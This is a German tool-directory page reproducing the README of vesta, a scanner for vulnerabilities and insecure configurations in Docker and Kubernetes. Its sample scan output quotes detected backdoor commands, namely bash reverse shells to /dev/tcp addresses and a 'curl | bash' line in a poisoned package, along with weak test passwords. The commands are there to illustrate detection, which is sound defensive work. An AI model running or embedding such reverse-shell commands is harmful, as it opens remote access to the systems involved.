Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
vesta — Ein Toolkit zur statischen Analyse von Schwachstellen und Docker- und Kubernetes-Clusterkonfigurationen, basierend auf realen Penetrationstests in der Cloud. | Kitploit
Tools/GitHubGitHub/kvesta/vesta
Statische AnalyseSchwachstellenscannerContainer-SicherheitKonfigurationsprüfungCloud-SicherheitDevSecOps
GitHubkvesta/vesta

vesta

Ein Toolkit zur statischen Analyse von Schwachstellen und Docker- und Kubernetes-Clusterkonfigurationen, basierend auf realen Penetrationstests in der Cloud.

Repository anzeigen
20531vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen


Ein Toolkit zur statischen Analyse von Schwachstellen und zur Erkennung von Docker- und Kubernetes-Clusterkonfigurationen, basierend auf realen Penetrationstests im Cloud Computing.

English · 简体中文

Überblick

Vesta ist ein Toolkit zur statischen Analyse von Schwachstellen und zur Erkennung von Docker- und Kubernetes-Clusterkonfigurationen. Es überprüft Kubernetes- und Docker-Konfigurationen, Cluster-Pods und Container auf Sicherheitspraktiken.

Vesta ist ein flexibles Toolkit, das auf physischen Maschinen verschiedener Systemtypen (Windows, Linux, MacOS) ausgeführt werden kann.

Was kann vesta prüfen

Scannen

  • Unterstützt das Scannen von Eingaben
    • Image
    • Container
    • Dateisystem
    • VM (TODO)
  • Scannt die Schwachstellen der wichtigsten Paketverwaltungen
    • apt/apt-get
    • rpm
    • yum
    • dpkg
  • Scannt schädliche Pakete und Schwachstellen von sprachspezifischen Paketen
    • Java (Jar, War. Hauptbibliothek: log4j)
    • NodeJs (NPM, YARN)
    • Python (Wheel, Poetry)
    • Golang (Go-Binärdatei)
    • PHP (Composer, Haupt-Frameworks: Laravel, ThinkPHP, WordPress, WordPress-Plugins usw.)
    • Rust (Rust-Binärdatei)
    • Andere (andere Schwachstellen, die zu einem potenziellen Containerausbruch führen können, und Überprüfung auf verdächtige vergiftete Images)

Docker


Kubernetes

Build

Vesta ist mit Go 1.18 erstellt.```bash make build

root@kitploit:~
## Schnellstart

Beispiel für einen Image- oder Container-Scan, verwenden Sie `-f` zur Eingabe einer tar-Datei, starten Sie vesta:```bash
# Container
vesta scan image cve-2019-14234_web:latest
vesta scan image -f example.tar

# Image
vesta scan container <CONTAINER ID>
vesta scan container -f example.tar

# Filesystem
vesta scan fs <path_of_filesystem>

Ouput:```bash 2022/11/29 22:50:00 Searching for image 2022/11/29 22:50:19 Begin upgrading vulnerability database 2022/11/29 22:50:19 Vulnerability Database is already initialized 2022/11/29 22:50:19 Begin to analyze the layer 2022/11/29 22:50:35 Begin to scan the layer

Detected 216 vulnerabilities

+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+ | 208 | python3.6 - Django | 2.2.3 | CVE-2019-14232 | 7.5 | high | An issue was discovered | | | | | | | | in Django 1.11.x before | | | | | | | | 1.11.23, 2.1.x before 2.1.11, | | | | | | | | and 2.2.x before 2.2.4. If | | | | | | | | django.utils.text.Truncator's | | | | | | | | chars() and words() methods | | | | | | | | were passed the html=True | | | | | | | | argument, t ... | +-----+ +-----------------+------------------+-------+----------+------------------------------------------------------------------+ | 209 | | 2.2.3 | CVE-2019-14233 | 7.5 | high | An issue was discovered | | | | | | | | in Django 1.11.x before | | | | | | | | 1.11.23, 2.1.x before 2.1.11, | | | | | | | | and 2.2.x before 2.2.4. | | | | | | | | Due to the behaviour of | | | | | | | | the underlying HTMLParser, | | | | | | | | django.utils.html.strip_tags | | | | | | | | would be extremely ... | +-----+ +-----------------+------------------+-------+----------+------------------------------------------------------------------+ | 210 | | 2.2.3 | CVE-2019-14234 | 9.8 | critical | An issue was discovered in | | | | | | | | Django 1.11.x before 1.11.23, | | | | | | | | 2.1.x before 2.1.11, and 2.2.x | | | | | | | | before 2.2.4. Due to an error | | | | | | | | in shallow key transformation, | | | | | | | | key and index lookups for | | | | | | | | django.contrib.postgres.f ... | +-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+ | 211 | python3.6 - numpy | 1.24.2 | | 8.5 | high | Malicious package is detected in | | | | | | | | '/usr/local/lib/python3.6/site-packages/numpy/setup.py', | | | | | | | | malicious command "curl | bash" are | | | | | | | | detected. | +-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+

Docker Histories: +----+---------------+----------------------------+-------+-------+--------+--------------------------------+ | ID | NAME | CURRENT/VULNERABLE VERSION | CVEID | SCORE | LEVEL | DESCRIPTION | +----+---------------+----------------------------+-------+-------+--------+--------------------------------+ | 1 | Image History | - / - | - | 0.0 | high | Confusion value found | | | | | | | | in ENV: 'command' with | | | | | | | | the plain text 'bash -i | | | | | | | | >&/dev/tcp/127.0.0.1/9999 0>&1 | | | | | | | | '. | +----+---------------+----------------------------+-------+-------+--------+--------------------------------+ | 2 | | - / - | - | 0.0 | medium | Docker history has found the | | | | | | | | senstive environment with | | | | | | | | key 'SECRET_KEY' and value: | | | | | | | | 123456. | +----+---------------+----------------------------+-------+-------+--------+--------------------------------+

root@kitploit:~
<details>
<summary>Ergebnis</summary>

![](https://assets.kitploit.com/production/public/readmes/5859/9812488f35975e6dfeb2fb38e3498564a2fd1c8d699ccbff2f409390dcc39afd.gif)

</details>

Beispiel für docker config scan, start vesta:```bash
vesta analyze docker

Oder mit dokcer ausführen```bash make run.docker

root@kitploit:~
Ausgabe:```bash
2022/11/29 23:06:32 Start analysing
2022/11/29 23:06:32 Getting engine version
2022/11/29 23:06:32 Getting docker server version
2022/11/29 23:06:32 Getting kernel version

Detected 3 vulnerabilities

+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| ID |      CONTAINER DETAIL      |     PARAM      |             VALUE              | SEVERITY |          DESCRIPTION           |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
|  1 | Name: Kernel               | kernel version | 5.10.104-linuxkit              | critical | Kernel version is suffering    |
|    | ID: None                   |                |                                |          | the CVE-2022-0492 with         |
|    |                            |                |                                |          | CAP_SYS_ADMIN and v1           |
|    |                            |                |                                |          | architecture of cgroups        |
|    |                            |                |                                |          | vulnerablility, has a          |
|    |                            |                |                                |          | potential container escape.    |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
|  2 | Name: vesta_vuln_test      | kernel version | 5.10.104-linuxkit              | critical | Kernel version is suffering    |
|    | ID: 207cf8842b15           |                |                                |          | the Dirty Pipe vulnerablility, |
|    |                            |                |                                |          | has a potential container      |
|    |                            |                |                                |          | escape.                        |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
|  3 | Name: Image Tag            | Privileged     | true                           | critical | There has a potential container|
|    | ID: None                   |                |                                |          | escape in privileged  module.  |
|    |                            |                |                                |          |                                |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
|  4 | Name: Image Configuration  | Image History  | Image name:                    | high     | Weak password found            |
|    | ID: None                   |                | vesta_history_test:latest |    |          | in command: ' echo             |
|    |                            |                | Image ID: 4bc05e1e3881         |          | 'password=test123456' >        |
|    |                            |                |                                |          | config.ini # buildkit'.        |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+

Beispiel für Kubernetes-Konfigurationsscan, start vesta:```bash vesta analyze k8s

root@kitploit:~
Ausgabe:```bash
2022/11/29 23:15:59 Start analysing
2022/11/29 23:15:59 Getting docker server version
2022/11/29 23:15:59 Getting kernel version

Detected 4 vulnerabilities

Pods:
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| ID |           POD DETAIL           |             PARAM              |             VALUE              |         TYPE          | SEVERITY |          DESCRIPTION           |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|  1 | Name: vulntest | Namespace:    | sidecar name: vulntest |       | true                           | Pod                   | critical | There has a potential          |
|    | default | Status: Running |    | Privileged                     |                                |                       |          | container escape in privileged |
|    | Node Name: docker-desktop      |                                |                                |                       |          | module.                        |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: vulntest |       | Token:Password123456           | Sidecar EnvFrom       | high     | Sidecar envFrom ConfigMap has  |
|    |                                | env                            |                                |                       |          | found weak password:           |
|    |                                |                                |                                |                       |          | 'Password123456'.              |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: sidecartest |    | MALWARE: bash -i >&            | Sidecar Env           | high     | Container 'sidecartest' finds  |
|    |                                | env                            | /dev/tcp/10.0.0.1/8080 0>&1    |                       |          | high risk content(score:       |
|    |                                |                                |                                |                       |          | 0.91 out of 1.0), which is a   |
|    |                                |                                |                                |                       |          | suspect command backdoor.      |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|  2 | Name: vulntest2 | Namespace:   | sidecar name: vulntest2 |      | CAP_SYS_ADMIN                  | capabilities.add      | critical | There has a potential          |
|    | default | Status: Running |    | capabilities                   |                                |                       |          | container escape in privileged |
|    | Node Name: docker-desktop      |                                |                                |                       |          | module.                        |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: vulntest2 |      | true                           | kube-api-access-lcvh8 | critical | Mount service account          |
|    |                                | automountServiceAccountToken   |                                |                       |          | and key permission are         |
|    |                                |                                |                                |                       |          | given, which will cause a      |
|    |                                |                                |                                |                       |          | potential container escape.    |
|    |                                |                                |                                |                       |          | Reference clsuterRolebind:     |
|    |                                |                                |                                |                       |          | vuln-clusterrolebinding |      |
|    |                                |                                |                                |                       |          | roleBinding: vuln-rolebinding  |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: vulntest2 |      | cpu                            | Pod                   | low      | CPU usage is not limited.      |
|    |                                | Resource                       |                                |                       |          |                                |
|    |                                |                                |                                |                       |          |                                |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+

Configures:
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| ID |            TYPEL            |             PARAM              |                         VALUE                          | SEVERITY |          DESCRIPTION           |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  1 | K8s version less than v1.24 | kernel version                 | 5.10.104-linuxkit                                      | critical | Kernel version is suffering    |
|    |                             |                                |                                                        |          | the CVE-2022-0185 with         |
|    |                             |                                |                                                        |          | CAP_SYS_ADMIN vulnerablility,  |
|    |                             |                                |                                                        |          | has a potential container      |
|    |                             |                                |                                                        |          | escape.                        |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  2 | ConfigMap                   | ConfigMap Name: vulnconfig     | db.string:mysql+pymysql://dbapp:Password123@db:3306/db | high     | ConfigMap has found weak       |
|    |                             | Namespace: default             |                                                        |          | password: 'Password123'.       |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  3 | Secret                      | Secret Name: vulnsecret-auth   | password:Password123                                   | high     | Secret has found weak          |
|    |                             | Namespace: default             |                                                        |          | password: 'Password123'.       |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  4 | ClusterRoleBinding          | binding name:                  | verbs: get, watch, list,                               | high     | Key permissions with key       |
|    |                             | vuln-clusterrolebinding |      | create, update | resources:                            |          | resources given to the         |
|    |                             | rolename: vuln-clusterrole |   | pods, services                                         |          | default service account, which |
|    |                             | kind: ClusterRole | subject    |                                                        |          | will cause a potential data    |
|    |                             | kind: Group | subject name:    |                                                        |          | leakage.                       |
|    |                             | system:serviceaccounts:vuln |  |                                                        |          |                                |
|    |                             | namespace: vuln                |                                                        |          |                                |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  5 | RoleBinding                 | binding name: vuln-rolebinding | verbs: get, watch, list,                               | high     | Key permissions with key       |
|    |                             | | rolename: vuln-role | role   | create, update | resources:                            |          | resources given to the         |
|    |                             | kind: Role | subject kind:     | pods, services                                         |          | default service account, which |
|    |                             | ServiceAccount | subject name: |                                                        |          | will cause a potential data    |
|    |                             | default | namespace: default   |                                                        |          | leakage.                       |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  6 | ClusterRoleBinding          | binding name:                  | verbs: get, watch, list,                               | warning  | Key permission are given       |
|    |                             | vuln-clusterrolebinding2 |     | create, update | resources:                            |          | to unknown user 'testUser',    |
|    |                             | rolename: vuln-clusterrole |   | pods, services                                         |          | printing it for checking.      |
|    |                             | subject kind: User | subject   |                                                        |          |                                |
|    |                             | name: testUser | namespace:    |                                                        |          |                                |
|    |                             | all                            |                                                        |          |                                |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
Ergebnis

Hilfeinformationen```bash

$./vesta -h Vesta is a static analysis of vulnerabilities, Docker and Kubernetes configuration detect toolkit Tutorial is available at https://github.com/kvesta/vesta

Usage: vesta [command]

Available Commands: analyze Kubernetes analyze completion Generate the autocompletion script for the specified shell help Help about any command scan Container scan update Update vulnerability database version Print version information and quit

Flags: -h, --help help for vesta

root@kitploit:~
## Veranstaltung

### KCon 2023 Waffenliste
- [https://kcon.knownsec.com/index.php?s=bqp&c=category&id=2](https://kcon.knownsec.com/index.php?s=bqp&c=category&id=2)
Tool herunterladen
UnterstütztPrüfpunktBeschreibungSchweregradReferenz
✔PrivilegeAllowedPrivilegiertes Modul ist zugelassen.criticalRef
✔CapabilitiesGefährliche Capabilities sind geöffnet.criticalRef
✔Volume MountMountet gefährliche Speicherorte.criticalRef
✔Docker UnauthorizedPort 2375 ist geöffnet und nicht autorisiert.criticalRef
✔Kernel versionKernelversion liegt unter der Escape-Version.criticalRef
✔Network ModuleNetzwerkmodul ist host und containerd-Version unter 1.41.critical/medium
✔Pid ModulePid-Modul ist host.high
✔Docker Server versionServerversion enthält eine anfällige Version.critical/high/medium/low
✔Docker env password checkÜberprüft schwache Passwörter in der Datenbank.high/medium
✔Docker HistoryDocker-Layer und -Umgebung enthalten einige gefährliche Befehle.high/medium
✔Docker BackdoorDocker-Env-Befehl enthält bösartige Befehle.critical/high
✔Docker SwarmDocker-Swarm hat gefährliche Konfigurationen oder Geheimnisse, oder Container sind unsicher.medium/low
✔Docker supply chainDocker-Lieferkette hat anfällige Konfigurationencritical/high/mediumRef
UnterstütztPrüfpunktBeschreibungSchweregradReferenz
✔PrivilegeAllowedPrivilegiertes Modul ist zugelassen.criticalRef
✔CapabilitiesGefährliche Capabilities sind geöffnet.criticalRef
✔PV and PVCPV ist auf gefährlichem Speicherort gemountet und aktiv.critical/mediumRef
✔RBACRBAC hat einige unsichere Konfigurationen in clusterrolebingding oder rolebinding.high/medium/low/warning
✔Kubernetes-dashboradÜberprüft -enable-skip-login und Kontoberechtigungen.critical/high/lowRef
✔Kernel versionKernelversion liegt unter der Escape-Version.criticalRef
✔Docker Server version (k8s Versionen unter v1.24)Serverversion enthält eine anfällige Version.critical/high/medium/low
✔Kubernetes-ZertifikatsablaufZertifikat läuft nach 30 Tagen ab.medium
✔ConfigMap und Secret-ÜberprüfungÜberprüft schwache Passwörter in ConfigMap oder Secret.high/medium/lowRef
✔PodSecurityPolicy-Überprüfung (k8s Version unter v1.25)PodSecurityPolicy toleriert gefährliche Pod-Konfigurationen.high/medium/lowRef
✔Auto Mount ServiceAccount TokenMountet das standardmäßige Service-Token.critical/high/medium/lowRef
✔NoResourceLimitsKeine Ressourcenlimits festgelegt.lowRef
✔Job und CronjobKein seccomp oder seLinux sind in Job oder CronJob gesetzt.lowRef
✔Envoy adminEnvoy-Admin ist geöffnet und hört auf 0.0.0.0.high/mediumRef
✔Cilium versionCilium hat eine anfällige Version.critical/high/medium/lowRef
✔Istio-KonfigurationenIstio hat eine anfällige Version und anfällige Konfigurationen.critical/high/medium/lowRef
✔Kubelet 10250/10255 und Kubectl proxyPort 10255/10250 ist geöffnet und nicht autorisiert, oder Kubectl-Proxy ist geöffnet.high/medium/low
✔Etcd-KonfigurationÜberprüfung der sicheren Etcd-Konfiguration.high/medium
✔Sidecar-KonfigurationenSidecar hat einige gefährliche Konfigurationen.critical/high/medium/low
✔Pod-AnnotationPod-Annotation hat einige unsichere Konfigurationen.high/medium/low/warningRef
✔DaemonSetDaemonSet hat unsichere Konfigurationen.critical/high/medium/low
✔BackdoorErkennung von Hintertüren.critical/highRef
✔Laterale AdminbewegungPod gibt einen Masterknoten an.medium/low
https://vuln.com